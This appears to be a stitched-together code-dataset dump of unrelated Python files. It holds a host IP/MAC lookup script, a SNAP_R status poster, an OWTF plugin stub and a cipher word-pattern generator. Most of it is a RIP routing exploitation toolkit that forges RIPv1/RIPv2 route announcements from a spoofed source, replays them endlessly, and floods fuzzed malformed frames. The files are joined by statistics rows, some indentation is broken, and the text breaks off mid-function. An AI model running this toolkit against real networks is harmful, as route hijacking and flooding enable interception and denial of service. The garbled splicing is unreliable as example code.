Author: Christopher Duffy
Date: February 2, 2015
Purpose: To grab your current Public IP (Eth & WLAN), Private IP, MAC Addresses, FQDN, and Hostname
Name: hostDetails.py
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import os
import socket
import subprocess
import shutil
import errno
if os.name != "nt":
import fcntl
import urllib2
import struct
import uuid
def get_ip(inter):
    """Return the IPv4 address bound to interface *inter* via the Linux
    SIOCGIFADDR ioctl (0x8915)."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    packed_name = struct.pack('256s', inter[:15])
    ifreq = fcntl.ioctl(probe.fileno(), 0x8915, packed_name)  # SIOCGIFADDR
    return socket.inet_ntoa(ifreq[20:24])
def get_mac_address(inter):
    """Return *inter*'s MAC as aa:bb:cc:dd:ee:ff via the Linux SIOCGIFHWADDR
    ioctl (0x8927). Python 2 byte handling (ord over str) assumed."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    ifreq = fcntl.ioctl(probe.fileno(), 0x8927, struct.pack('256s', inter[:15]))
    octets = ['%02x' % ord(ch) for ch in ifreq[18:24]]
    return ':'.join(octets)
def get_localhost_details(interfaces_eth, interfaces_wlan):
    """Collect local host identity details.

    interfaces_eth / interfaces_wlan are candidate interface-name lists to
    probe on Linux. Returns a 9-tuple:
    (hostdata, hostname, windows_ip, eth_ip, wlan_ip, host_fqdn,
     eth_mac, wlan_mac, windows_mac) — unset fields keep the "None" sentinel.
    """
    # "None" strings act as sentinels checked by the caller.
    hostdata = "None"
    hostname = "None"
    windows_ip = "None"
    eth_ip = "None"
    wlan_ip = "None"
    host_fqdn = "None"
    eth_mac = "None"
    wlan_mac = "None"
    windows_mac = "None"
    hostname = socket.gethostbyname(socket.gethostname())
    # Linux branch: only taken when the hostname resolves to loopback.
    # NOTE(review): a non-Windows host whose name resolves to a real address
    # falls through to the "Windows" branch below — confirm this is intended.
    if hostname.startswith("127.") and os.name != "nt":
        hostdata = socket.gethostbyaddr(socket.gethostname())
        hostname = str(hostdata[1]).strip('[]')
        host_fqdn = socket.getfqdn()
        # First responding ethernet interface wins.
        for interface in interfaces_eth:
            try:
                eth_ip = get_ip(interface)
                if not "None" in eth_ip:
                    eth_mac = get_mac_address(interface)
                    break
            except IOError:
                # Interface absent/down; try the next candidate.
                pass
        # First responding wireless interface wins.
        for interface in interfaces_wlan:
            try:
                wlan_ip = get_ip(interface)
                if not "None" in wlan_ip:
                    wlan_mac = get_mac_address(interface)
                    break
            except IOError:
                pass
    else:
        # Windows (or non-loopback) path: use uuid.getnode() for the MAC and
        # format it as colon-separated hex pairs.
        windows_ip = socket.gethostbyname(socket.gethostname())
        windows_mac = uuid.getnode()
        windows_mac = ':'.join(("%012X" % windows_mac)[i:i+2] for i in range(0, 12, 2))
        hostdata = socket.gethostbyaddr(socket.gethostname())
        hostname = str(socket.gethostname())
        host_fqdn = socket.getfqdn()
    return hostdata, hostname, windows_ip, eth_ip, wlan_ip, host_fqdn, eth_mac, wlan_mac, windows_mac
def get_public_ip(request_target):
    """Fetch this host's public IP from *request_target* (an HTTP echo URL).

    Returns the body of the response, or the sentinel string "None" on
    failure — matching the "None" convention used throughout this script.

    Fixes: the original ignored its parameter and read the module-level
    `target_url` instead, and raised NameError (unbound local) when the
    request failed instead of returning.
    """
    public_ip_address = "None"
    grabber = urllib2.build_opener()
    grabber.addheaders = [('User-agent', 'Mozilla/5.0')]
    try:
        public_ip_address = grabber.open(request_target).read()
    except urllib2.HTTPError as error:
        print("There was an error trying to get your Public IP: %s" % (error))
    except urllib2.URLError as error:
        print("There was an error trying to get your Public IP: %s" % (error))
    return public_ip_address
# --- module-level defaults: "None" strings act as sentinels tested below ---
wireless_ip = "None"
windows_ip = "None"
ethernet_ip = "None"
public_ip = "None"
host_fqdn = "None"
hostname = "None"
fqdn = "None"
ethernet_mac = "None"
wireless_mac = "None"
windows_mac = "None"
# External echo service used to discover the public address.
target_url = "http://ip.42.pl/raw"
# Candidate interface names probed on Linux hosts.
inter_eth = ["eth0", "eth1", "eth2", "eth3"]
inter_wlan = ["wlan0", "wlan1", "wlan2", "wlan3", "wifi0", "wifi1", "wifi2", "wifi3", "ath0", "ath1", "ath2", "ath3"]
public_ip = get_public_ip(target_url)
hostdata, hostname, windows_ip, ethernet_ip, wireless_ip, host_fqdn, ethernet_mac, wireless_mac, windows_mac = get_localhost_details(inter_eth, inter_wlan)
# --- report (Python 2 print statements: `print("...") % x` formats via the
# statement form; under Python 3 this would raise TypeError at runtime) ---
if not "None" in public_ip:
    print("Your Public IP address is: %s") % (str(public_ip))
else:
    print("Your Public IP address was not found")
if not "None" in ethernet_ip:
    print("Your Ethernet IP address is: %s") % (str(ethernet_ip))
    print("Your Ethernet MAC address is: %s") % (str(ethernet_mac))
elif os.name != "nt":
    print("No active Ethernet Device was found")
if not "None" in wireless_ip:
    print("Your Wireless IP address is: %s") % (str(wireless_ip))
    print("Your Wireless Devices MAC Address is: %s") % (str(wireless_mac))
elif os.name != "nt":
    print("No active Wireless Device was found")
if not "None" in windows_ip:
    print("Your Windows Host IP address is: %s") % (str(windows_ip))
    print("Your Windows Mac address is: %s") % (str(windows_mac))
else:
    print("You are not running Windows")
if not "None" in hostname:
    print("Your System's hostname is: %s") % (hostname)
if host_fqdn == 'localhost':
    print("Your System is not Registered to a Domain")
else:
    print("Your System's Fully Qualifed Domain Name is: %s") % (host_fqdn)
| 37.5 | 155 | 0.672233 |
SNAP_R | # THIS PROGRAM IS TO BE USED FOR EDUCATIONAL PURPOSES ONLY.
# CAN BE USED FOR INTERNAL PEN-TESTING, STAFF RECRUITMENT, SOCIAL ENGAGEMENT
import credentials
import argparse
import tweepy
# Posts a new status
def post_status(text):
    """Publish *text* as a new status on the account configured in
    credentials.py (OAuth via tweepy)."""
    handler = tweepy.OAuthHandler(credentials.consumer_key,
                                  credentials.consumer_secret)
    handler.set_access_token(credentials.access_token,
                             credentials.access_token_secret)
    client = tweepy.API(handler, parser=tweepy.parsers.JSONParser())
    client.update_status(text)
if __name__ == '__main__':
    # CLI entry point: a single positional argument is posted verbatim to the
    # timeline of the account configured in credentials.py.
    parser = argparse.ArgumentParser(description="Posts status to timeline"
                                                 " of user given"
                                                 " in credentials.py")
    parser.add_argument("text", help="text to post")
    args = parser.parse_args()
    post_status(args.text)
| 36.666667 | 76 | 0.612403 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"


def run(PluginInfo):
    """OWTF plugin entry point: render a placeholder HTML string."""
    return plugin_helper.HtmlString("Intended to show helpful info in the future")
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | # Makes the wordPatterns.py File
# http://inventwithpython.com/hacking (BSD Licensed)
# Creates wordPatterns.py based on the words in our dictionary
# text file, dictionary.txt. (Download this file from
# http://invpy.com/dictionary.txt)
import pprint
def getWordPattern(word):
    """Return the letter-repetition pattern of *word*.

    Each distinct letter (case-insensitive) is numbered in order of first
    appearance; e.g. 'DUSTBUSTER' -> '0.1.2.3.4.1.2.3.5.6'.
    """
    first_seen = {}
    pattern = []
    for letter in word.upper():
        if letter not in first_seen:
            # len(first_seen) is the next unused index.
            first_seen[letter] = str(len(first_seen))
        pattern.append(first_seen[letter])
    return '.'.join(pattern)
def main():
    """Generate wordPatterns.py from dictionary.txt.

    Builds a dict mapping each word pattern (see getWordPattern) to the list
    of dictionary words with that pattern, then writes it out as a single
    giant assignment statement.

    Fix: both files are now opened with `with`, so the handles are closed
    even if reading or writing raises.
    """
    allPatterns = {}
    with open('dictionary.txt') as fo:
        wordList = fo.read().split('\n')
    for word in wordList:
        # Get the pattern for each string in wordList and group by it.
        pattern = getWordPattern(word)
        allPatterns.setdefault(pattern, []).append(word)
    # This is code that writes code. The wordPatterns.py file contains
    # one very, very large assignment statement.
    with open('wordPatterns.py', 'w') as fo:
        fo.write('allPatterns = ')
        fo.write(pprint.pformat(allPatterns))
# Build wordPatterns.py only when executed as a script (not on import).
if __name__ == '__main__':
    main()
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer, covering RIPAuth and RIPEntry structures fuzzing
#
# Python requirements:
# - scapy
#
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
#
import sys
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
# Tool version shown in the CLI banner.
VERSION = '0.1'
# Global runtime settings: parseOptions()/selectDefaultInterface() mutate this
# in place; Logger reads the 'verbose'/'debug' flags; the remaining keys
# describe the spoofed route and optional RIP authentication material.
config = {
    'verbose' : False,
    'debug' : False,
    'delay' : 1.0,
    'interface': None,
    'processors' : 8,
    'network': '',
    'spoof': '',
    'nexthop': '',
    'netmask': '',
    'metric': 0,
    'auth-type': '',
    'auth-data': '',
}
# Attack registry; not populated within this part of the file.
attacks = {}
# Cooperative stop flag read by flooder() workers.
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
    """Worker body run in a multiprocessing.Process: send every prepared
    scapy frame in *packets*. *num* is only a task id used in log lines.

    NOTE(review): stopThreads is a module-level flag; since each worker is a
    separate process it sees its own copy, so a change in the parent will not
    stop workers — confirm whether this was intended for a threaded version.
    """
    Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
    for p in packets:
        if stopThreads: break
        try:
            if stopThreads:
                raise KeyboardInterrupt
            sendp(p, verbose = False)
            # Only log small frames to keep the debug output readable.
            if len(p) < 1500:
                Logger.dbg("Sent: \n" + str(p))
        except KeyboardInterrupt:
            break
        except Exception as e:
            # Deliberate best-effort flood: individual send failures are ignored.
            pass
    Logger.dbg('Stopping task: {}'.format(num))
class Logger:
    """Minimal stdout logger gated by the global ``config`` verbosity flags."""

    @staticmethod
    def _out(x):
        # Emit only when verbose or debug output was requested.
        if not (config['verbose'] or config['debug']):
            return
        sys.stdout.write(x + '\n')

    @staticmethod
    def out(x):
        Logger._out('[.] ' + x)

    @staticmethod
    def info(x):
        Logger._out('[.] ' + x)

    @staticmethod
    def dbg(x):
        # Debug lines require the debug flag in addition to the _out gate.
        if not config['debug']:
            return
        Logger._out('[dbg] ' + x)

    @staticmethod
    def err(x):
        # Errors are always printed, regardless of verbosity.
        sys.stdout.write('[!] ' + x + '\n')

    @staticmethod
    def fail(x):
        Logger._out('[-] ' + x)

    @staticmethod
    def ok(x):
        Logger._out('[+] ' + x)
# Well, not very fuzzy that fuzzer I know.
class Fuzzer:
    """Produces boundary integers and cyclic strings for building fuzzed frames.

    The integer helpers enumerate values around powers of two (classic
    overflow/off-by-one boundaries); deBrujinPattern() yields the familiar
    'Aa0Aa1...' cyclic pattern used to locate offsets after a crash.
    """

    @staticmethod
    def get8bitFuzzes():
        """Integers around every power of two up to 2**8, within 8-bit range."""
        out = set()
        for i in range(9):
            out.update((2 ** i - 2, 2 ** i - 1, 2 ** i, 2 ** i + 1))
        return [k for k in out if abs(k) < 2 ** 8]

    @staticmethod
    def get16bitFuzzes():
        """Integers around every power of two up to 2**16, within 16-bit range."""
        out = set()
        for i in range(17):
            out.update((2 ** i - 2, 2 ** i - 1, 2 ** i, 2 ** i + 1))
        return [k for k in out if abs(k) < 2 ** 16]

    @staticmethod
    def get32bitFuzzes():
        """Integers around every power of two up to 2**32, within 32-bit range."""
        out = set()
        for i in range(33):
            out.update((2 ** i - 2, 2 ** i - 1, 2 ** i, 2 ** i + 1))
        return [k for k in out if abs(k) < 2 ** 32]

    @staticmethod
    def deBrujinPattern(length):
        """Return exactly *length* characters of the cyclic 'Aa0Aa1...' pattern.

        The unique portion is 26*26*10 three-character triplets = 20280 chars;
        longer requests are padded with 'A'. Fix: the original returned one
        character too few for requests >= 20280 (the padding arithmetic
        subtracted an extra 1).
        """
        if length == 0:
            return ''
        if length >= 20280:
            # Longest unique pattern first, then pad to the exact length.
            prefix = Fuzzer.deBrujinPattern(20280 - 1)
            return prefix + "A" * (length - len(prefix))
        pattern = ''
        for upper in string.ascii_uppercase:
            for lower in string.ascii_lowercase:
                for digit in string.digits:
                    if len(pattern) >= length:
                        return pattern[:length]
                    pattern += upper + lower + digit
        return pattern

    @staticmethod
    def getFuzzyStrings(maxLen = -1, allOfThem = True):
        """Set of cyclic-pattern strings at 16-bit boundary lengths; when
        allOfThem, also every multiple of 256 below 65400. maxLen != -1 caps
        the result lengths."""
        out = set()
        for b in Fuzzer.get16bitFuzzes():
            out.add(Fuzzer.deBrujinPattern(b))
        if allOfThem:
            for b in range(0, 65400, 256):
                if maxLen != -1 and b > maxLen:
                    break
                out.add(Fuzzer.deBrujinPattern(b))
        if maxLen != -1:
            return set([x for x in out if len(x) <= maxLen])
        return out

    @staticmethod
    def get32bitProblematicPowersOf2():
        """Alias kept for readability at call sites."""
        return Fuzzer.get32bitFuzzes()
class RoutingAttack:
    """Base interface for the attack implementations in this tool.

    Subclasses override injectOptions() to validate/merge options and
    launch() to run the attack; both are no-ops here.
    """
    def __init__(self):
        pass
    def injectOptions(self, params, config):
        # params: per-attack settings; config: global CLI configuration.
        pass
    def launch(self):
        # Run the attack; implemented by subclasses.
        pass
class Sniffer(RoutingAttack):
    """Placeholder authentication-string sniffer (not yet implemented).

    Fix: processPacket() was declared without ``self`` even though launch()
    invokes it as ``self.processPacket(d)``, which would raise a TypeError;
    it now has a proper instance-method signature.
    """

    def __init__(self):
        pass

    def injectOptions(self, params, config):
        """Merge per-attack params into the global config and keep a reference."""
        self.config = config
        self.config.update(params)

    def processPacket(self, pkt):
        # TODO: hunt for authentication strings in the captured packet.
        raise Exception('Not yet implemented.')

    def launch(self):
        # TODO: drop this guard once processPacket() does real work.
        raise Exception('Not yet implemented.')
        # --- unreachable scaffolding kept from the original draft ---
        def packetCallback(d):
            self.processPacket(d)
        try:
            pkts = sniff(
                count = 1000,
                filter = 'udp port 520',
                timeout = 10.0,
                prn = packetCallback,
                iface = self.config['interface']
            )
        except Exception as e:
            if 'Network is down' in str(e):
                pass
            else:
                Logger.err('Exception occured during sniffing: {}'.format(str(e)))
        except KeyboardInterrupt:
            pass
class RIPv1v2Attacks(RoutingAttack):
    """Spoofed RIPv1/RIPv2 route announcement attack.

    Builds one RIP Response frame advertising an attacker-chosen route and
    replays it in a loop (sendp with loop=1) every `delay` seconds.
    """
    # Maps the CLI --auth-type names to RIP authentication type codes.
    ripAuthTypes = {
        'simple' : 2, 'md5' : 3, 'md5authdata': 1
    }
    def __init__(self):
        # Defaults; injectOptions() replaces this wholesale with the global
        # config merged with per-attack params.
        self.config = {
            'interface' : '',
            'delay': 1,
            'network' : '',
            'metric' : 10,
            'netmask' : '255.255.255.0',
            'nexthop' : '0.0.0.0',
            'spoof' : '',
            'version' : 0,
        }
    @staticmethod
    def getRipAuth(config):
        """Build a scapy RIPAuth header from config['auth-type']/['auth-data']."""
        ripauth = RIPAuth()
        ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
        if ripauth.authtype == 2:
            # Simple (plaintext) password authentication.
            ripauth.password = config['auth-data']
        elif ripauth.authtype == 1:
            # Raw MD5 authentication-data blob.
            ripauth.authdata = config['auth-data']
        elif ripauth.authtype == 3:
            # Keyed-MD5 header; offsets/sequence left at zero.
            ripauth.digestoffset = 0
            ripauth.keyid = 0
            ripauth.authdatalen = len(config['auth-data'])
            ripauth.seqnum = 0
        return ripauth
    def injectOptions(self, params, config):
        """Merge options and validate them; returns False when incomplete."""
        self.config = config
        self.config.update(params)
        Logger.info("Fake Route Announcement to be injected:")
        Logger.info("\tNetwork: {}".format(config['network']))
        Logger.info("\tNetmask: {}".format(config['netmask']))
        Logger.info("\tNexthop: {}".format(config['nexthop']))
        Logger.info("\tMetric: {}".format(config['metric']))
        if not config['network'] or not config['netmask'] \
            or not config['nexthop'] or not config['metric']:
            Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
            return False
        if params['version'] != 1 and params['version'] != 2:
            Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
            return False
        return True
    def launch(self):
        """Send the spoofed announcement forever, one frame per `delay` seconds."""
        packet = self.getPacket()
        Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
        sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
    def getPacket(self):
        """Assemble the Ether/IP/UDP/RIP(/RIPAuth)/RIPEntry frame to replay."""
        networkToAnnounce = self.config['network']
        metricToAnnounce = self.config['metric']
        netmaskToAnnounce = self.config['netmask']
        nexthopToAnnounce = self.config['nexthop']
        spoofedIp = self.config['spoof']
        etherframe = Ether() # Start definition of Ethernet Frame
        ip = IP() # IPv4 packet
        udp = UDP()
        udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
        udp.dport = 520
        rip = RIP()
        ripentry = RIPEntry() # Announced route
        ripentry.AF = "IP" # Address Family: IP
        if 'AF' in self.config.keys():
            ripentry.AF = self.config['AF']
        ripentry.addr = networkToAnnounce # Spoof route for this network...
        ripentry.metric = metricToAnnounce
        if self.config['version'] == 1:
            ip.dst = '255.255.255.255' # RIPv1 broadcast destination
            etherframe.dst = 'ff:ff:ff:ff:ff:ff'
            rip.version = 1 # RIPv1
            rip.cmd = 2 # Command: Response
        elif self.config['version'] == 2:
            ip.dst = '224.0.0.9' # RIPv2 multicast destination
            rip.version = 2 # RIPv2
            rip.cmd = 2 # Command: Response
            ripentry.RouteTag = 0
            ripentry.mask = netmaskToAnnounce
            ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
        if 'rip_cmd' in self.config.keys():
            rip.cmd = self.config['rip_cmd']
        if not self.config['auth-type']:
            rip_packet = etherframe / ip / udp / rip / ripentry
        else:
            ripauth = RIPv1v2Attacks.getRipAuth(self.config)
            Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
                self.config['auth-type'], self.config['auth-data']
            ))
            rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
        rip_packet[IP].src = spoofedIp
        return rip_packet
class RIPFuzzer(RoutingAttack):
    """RIPv1/RIPv2 protocol fuzzer.

    Generates a large set of malformed RIP frames (mutated command, version,
    authentication fields and RIPEntry counts) and floods them through a pool
    of worker processes running flooder().
    """
    # RIP command codes to mutate: valid ones plus reserved values.
    ripCommands = (
        1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
    )
    def __init__(self):
        # Defaults used when the caller supplies no per-attack params.
        self.config = {
            'interface' : '',
            'network' : '192.168.1.0',
            'metric' : 10,
            'netmask' : '255.255.255.0',
            'nexthop' : '0.0.0.0',
            'spoof' : '',
        }
    def injectOptions(self, params, config):
        # NOTE(review): replaces self.config with the global config; params is
        # stored but otherwise unused in this chunk — confirm intent.
        self.config = config
        self.params = params
        return True
    def launch(self):
        """Generate all fuzz cases, split them across workers and flood."""
        packets = set()
        Logger.info("Generating fuzzed packets for RIPv1...")
        packets.update(self.generateRipv1Packets())
        Logger.info("Generating fuzzed packets for RIPv2...")
        packets.update(self.generateRipv2Packets())
        Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
        # Round-robin the packets over the configured number of workers.
        # NOTE(review): mixes self.config['processors'] and the global
        # config['processors'] — they point at the same dict after
        # injectOptions(), but confirm before changing either.
        packetsLists = [[] for x in range(self.config['processors'])]
        packetsList = list(packets)
        for i in range(len(packetsList)):
            packetsLists[i % config['processors']].append(packetsList[i])
        jobs = []
        for i in range(config['processors']):
            task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
            jobs.append(task)
            task.daemon = True
            task.start()
        print('[+] Started flooding. Press CTRL-C to stop that.')
        try:
            while jobs:
                jobs = [job for job in jobs if job.is_alive()]
        except KeyboardInterrupt:
            # NOTE(review): binds a function-local stopThreads (no `global`),
            # and worker processes would not see the parent's flag anyway;
            # shutdown actually relies on the daemon flag — confirm intent.
            stopThreads = True
            print('\n[>] Stopping...')
        stopThreads = True
        time.sleep(3)
        Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
    def generateRipv1Packets(self):
        """Build the set of fuzzed RIPv1 broadcast frames."""
        packets = set()
        base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
        # Step 1: Fuzz on Command values.
        for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
            rip = RIP(version = 1, cmd = val)
            packets.add(base / rip)
            packets.add(base / rip / RIPEntry() )
        # Step 1b: Fuzz on Command values with packet filled up with data
        for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
            rip = RIP(version = 1, cmd = val)
            for data in Fuzzer.getFuzzyStrings():
                if not data: data = ''
                packets.add(base / rip / data)
                packets.add(base / rip / RIPEntry() / data)
        # Step 2: Fuzz on Response RIPEntry AF values.
        for val in set(Fuzzer.get8bitFuzzes()):
            rip = RIP(version = 1, cmd = 2)
            packets.add(base / rip / RIPEntry(AF = val) )
        # Step 3: Fuzz on Response RIPEntry RouteTag values.
        for val in set(Fuzzer.get8bitFuzzes()):
            rip = RIP(version = 1, cmd = 2)
            packets.add(base / rip / RIPEntry(RouteTag = val) )
        # Step 4: Fuzz on Response RIPEntry metric values.
        for val in set(Fuzzer.get8bitFuzzes()):
            rip = RIP(version = 1, cmd = 2)
            packets.add(base / rip / RIPEntry(metric = val) )
        # Step 5: Add multiple RIPEntry structures
        # NOTE(review): `break` aborts the whole step on the first oversized
        # count; since set iteration order is arbitrary, which entry counts
        # are produced is nondeterministic — confirm `continue` wasn't meant.
        for num in Fuzzer.get32bitProblematicPowersOf2():
            rip = RIP(version = 1, cmd = 2)
            entries = []
            try:
                ipv4 = socket.inet_ntoa(struct.pack('!L', num))
            except:
                ipv4 = '127.0.0.2'
            if (num * 20) > 2 ** 16:
                break
            for i in range(num):
                entries.append(RIPEntry(addr = ipv4))
            packets.add(base / rip / ''.join([str(x) for x in entries]))
        return packets
    def generateRipv2Packets(self):
        """Build the set of fuzzed RIPv2 multicast frames (spoofed source)."""
        packets = set()
        base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
        # Step 1: Fuzz on Command values.
        for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
            rip = RIP(version = 2, cmd = val)
            packets.add(base / rip)
            packets.add(base / rip / RIPEntry() )
        # Step 1b: Fuzz on Command values with packet filled up with data
        for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
            rip = RIP(version = 2, cmd = val)
            for data in Fuzzer.getFuzzyStrings():
                if not data: data = ''
                packets.add(base / rip / data)
                packets.add(base / rip / RIPEntry() / data)
        # Step 2: Fuzz on Version values.
        for val in set(Fuzzer.get8bitFuzzes()):
            rip = RIP(version = val, cmd = 1)
            packets.add(base / rip)
            packets.add(base / rip / RIPEntry() )
        # Step 3: Fuzz on Authentication data values.
        for val in set(Fuzzer.get8bitFuzzes()):
            rip = RIP(version = val, cmd = 1)
            for auth in RIPFuzzer.fuzzRipv2Auth():
                packets.add(base / rip / auth )
                packets.add(base / rip / auth / RIPEntry() )
        # Step 4: Fuzz on Response RIPEntry AF values.
        for val in set(Fuzzer.get8bitFuzzes()):
            rip = RIP(version = 2, cmd = 2)
            packets.add(base / rip / RIPEntry(AF = val) )
        # Step 5: Fuzz on Response RIPEntry RouteTag values.
        for val in set(Fuzzer.get8bitFuzzes()):
            rip = RIP(version = 2, cmd = 2)
            packets.add(base / rip / RIPEntry(RouteTag = val) )
        # Step 6: Fuzz on Response RIPEntry metric values.
        for val in set(Fuzzer.get8bitFuzzes()):
            rip = RIP(version = 2, cmd = 2)
            packets.add(base / rip / RIPEntry(metric = val) )
        # Step 7: Add multiple RIPEntry structures
        for num in Fuzzer.get32bitProblematicPowersOf2():
            rip = RIP(version = 2, cmd = 2)
            entries = []
            try:
                ipv4 = socket.inet_ntoa(struct.pack('!L', num))
            except:
                ipv4 = '127.0.0.2'
            if (num * 20) > 2 ** 16:
                break
            for i in range(num):
                entries.append(RIPEntry(addr = ipv4))
            packets.add(base / rip / ''.join([str(x) for x in entries]))
        return packets
    @staticmethod
    def fuzzRipv2Auth():
        """Build a set of mutated RIPAuth headers (type, offsets, ids, lengths)."""
        auths = set()
        # Step 1: Fuzz on RIPAuth authtype.
        for val in set(Fuzzer.get8bitFuzzes()):
            ripauth = RIPAuth()
            ripauth.authtype = val
            ripauth.password = '0123456789abcdef'
            auths.add(ripauth)
        # Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
        for val in set(Fuzzer.get16bitFuzzes()):
            ripauth = RIPAuth()
            ripauth.authtype = 1
            ripauth.digestoffset = val
            ripauth.keyid = 0
            ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
            ripauth.seqnum = 0
            auths.add(ripauth)
        # Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
        for val in set(Fuzzer.get8bitFuzzes()):
            ripauth = RIPAuth()
            ripauth.authtype = 1
            ripauth.digestoffset = 0
            ripauth.keyid = val
            ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
            ripauth.seqnum = 0
            auths.add(ripauth)
        # Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
        for val in set(Fuzzer.get8bitFuzzes()):
            ripauth = RIPAuth()
            ripauth.authtype = 1
            ripauth.digestoffset = 0
            ripauth.keyid = 0
            ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
            ripauth.seqnum = val
            auths.add(ripauth)
        # Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
        for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
            ripauth = RIPAuth()
            ripauth.authtype = 1
            ripauth.digestoffset = 0
            ripauth.keyid = 0
            ripauth.authdatalen = val
            ripauth.seqnum = 0
            auths.add(ripauth)
        return auths
def getHwAddr(ifname):
    """Return the MAC address of *ifname* via the Linux SIOCGIFHWADDR ioctl
    (0x8927), formatted aa:bb:cc:dd:ee:ff. Python 2 byte handling assumed."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    ifreq = fcntl.ioctl(sock.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
    return ':'.join('%02x' % ord(octet) for octet in ifreq[18:24])
def getIfaceIP(iface):
    """Return the first IPv4 address configured on *iface* (shells out to `ip`)."""
    lookup = "ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1"
    addr = shell(lookup)
    Logger.dbg('Interface: {} has IP: {}'.format(iface, addr))
    return addr
def shell(cmd):
    """Run *cmd* through the shell and return its combined output
    (Python 2 `commands` module)."""
    status_and_output = commands.getstatusoutput(cmd)
    result = status_and_output[1]
    Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, result))
    return result
def selectDefaultInterface():
    """Detect the default-route interface, store it in config['interface']
    and return its name; returns '' when no probe yields output."""
    global config
    # Local renamed from `commands` to avoid shadowing the stdlib module.
    probes = {
        'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
        'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
    }
    for probe in probes.values():
        out = shell(probe)
        if not out:
            continue
        Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
        config['interface'] = out
        return out
    return ''
def parseOptions(argv):
    """Parse command-line options into the global `config` dict.

    Returns the argparse namespace on success, or False on error (no attack
    given, unknown attack, or --auth-type supplied without --auth-data).
    Exits the process directly for "-t list".
    """
    global config
    print('''
        :: Routing Protocols Exploitation toolkit
        Sends out various routing protocols management frames
        Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
        v{}
'''.format(VERSION))
    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
    parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
    parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
